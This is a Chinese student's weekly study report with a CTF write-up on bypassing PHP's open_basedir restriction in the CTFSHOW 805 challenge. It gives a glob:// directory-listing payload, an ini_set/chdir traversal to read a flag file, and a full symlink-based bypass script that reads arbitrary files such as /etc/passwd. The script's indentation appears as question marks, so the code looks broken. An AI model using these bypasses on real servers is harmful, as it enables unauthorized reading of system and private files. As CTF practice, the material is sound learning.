一:
CTFSHOW805:
看到这个地方没有过滤信息就直接试了一下1=system(‘ls’);去读目录但是发现没反应就去看了一下phpinfo发现它是ban了很多函数然后open_basedir也开了所以这题就是要我们绕过open_basedir的题目,这类题在ctfshow命令执行的题中有出现过,就是通过glob协议进行目录读取,但是我忘了所以又重新学了一下glob协议的用法
glob伪协议
1=$a="glob:///*";
if($b=opendir($a)){
while (($file=readdir($b))!==false)
{echo $file." ";
}
closedir($b);
};
扫描目录得
然后因为有open_basedir限制目录,所以需要更改open_basedir限制的范围(注open_basedir范围修改不是随意修改,只能缩小不能变大,而且在任何目录下都有..和.目录)
姿势一:先创文件夹,在当前目录构造可以..的ini_set,然后通过多次chdir('..');跳转到根目录
mkdir("s");
chdir('s');
ini_set('open_basedir','..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
ini_set('open_basedir','/');
echo file_get_contents("/ctfshowflag");
姿势二:
直接上传p神脚本(但是太菜了还看不懂脚本怎么实现的)
<?php
/*
* by phithon
* From https://www.leavesongs.com
* detail: http://cxsecurity.com/issue/WLB-2009110068
*/
header('content-type: text/plain');
error_reporting(-1);
ini_set('display_errors', TRUE);
printf("open_basedir: %s\nphp_version: %s\n", ini_get('open_basedir'), phpversion());
printf("disable_functions: %s\n", ini_get('disable_functions'));
$file = str_replace('\\', '/', isset($_REQUEST['file']) ? $_REQUEST['file'] : '/etc/passwd');
$relat_file = getRelativePath(__FILE__, $file);
$paths = explode('/', $file);
$name = mt_rand() % 999;
$exp = getRandStr();
mkdir($name);
chdir($name);
for($i = 1 ; $i < count($paths) - 1 ; $i++){
????mkdir($paths[$i]);
????chdir($paths[$i]);
}
mkdir($paths[$i]);
for ($i -= 1; $i > 0; $i--) {
????chdir('..');
}
$paths = explode('/', $relat_file);
$j = 0;
for ($i = 0; $paths[$i] == '..'; $i++) {
????mkdir($name);
????chdir($name);
????$j++;
}
for ($i = 0; $i <= $j; $i++) {
????chdir('..');
}
$tmp = array_fill(0, $j + 1, $name);
symlink(implode('/', $tmp), 'tmplink');
$tmp = array_fill(0, $j, '..');
symlink('tmplink/' . implode('/', $tmp) . $file, $exp);
unlink('tmplink');
mkdir('tmplink');
delfile($name);
$exp = dirname($_SERVER['SCRIPT_NAME']) . "/{$exp}";
$exp = "http://{$_SERVER['SERVER_NAME']}{$exp}";
echo "\n-----------------content---------------\n\n";
echo file_get_contents($exp);
delfile('tmplink');
function getRelativePath($from, $to) {
??// some compatibility fixes for Windows paths
??$from = rtrim($from, '\/') . '/';
??$from = str_replace('\\', '/', $from);
??$to ??= str_replace('\\', '/', $to);
??$from ??= explode('/', $from);
??$to ????= explode('/', $to);
??$relPath ?= $to;
??foreach($from as $depth => $dir) {
????// find first non-matching dir
????if($dir === $to[$depth]) {
??????// ignore this directory
??????array_shift($relPath);
????} else {
??????// get number of remaining dirs to $from
??????$remaining = count($from) - $depth;
??????if($remaining > 1) {
????????// add traversals up to first matching dir
????????$padLength = (count($relPath) + $remaining - 1) * -1;
????????$relPath = array_pad($relPath, $padLength, '..');
????????break;
??????} else {
????????$relPath[0] = './' . $relPath[0];
??????}
????}
??}
??return implode('/', $relPath);
}
function delfile($deldir){
????if (@is_file($deldir)) {
????????@chmod($deldir,0777);
????????return @unlink($deldir);
????}else if(@is_dir($deldir)){
????????if(($mydir = @opendir($deldir)) == NULL) return false;
????????while(false !== ($file = @readdir($mydir)))
????????{
????????????$name = File_Str($deldir.'/'.$file);
????????????if(($file!='.') && ($file!='..')){delfile($name);}
????????}
????????@closedir($mydir);
????????@chmod($deldir,0777);
????????return @rmdir($deldir) ? true : false;
????}
}
function File_Str($string)
{
????return str_replace('//','/',str_replace('\\','/',$string));
}
function getRandStr($length = 6) {
????$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
????$randStr = '';
????for ($i = 0; $i < $length; $i++) {
????????$randStr .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
????}
????return $randStr;
}
二:未完成事项及原因
最近答辩和考试和其他事情太多了,这周自由太少,所以学的东西也比较少,而且最近对于学哪些知识比较迷茫,可能之后得做一个计划
三:下周计划做的事
学习反序列化
四:相关知识分享
glob协议:(27条消息) 『CTF Tricks』PHP-绕过open_basedir_Ho1aAs的博客-CSDN博客
chdir绕过open_basedir:(27条消息) [SUCTF 2019]EasyWeb【chdir()绕过open_basedir】_D.MIND的博客-CSDN博客
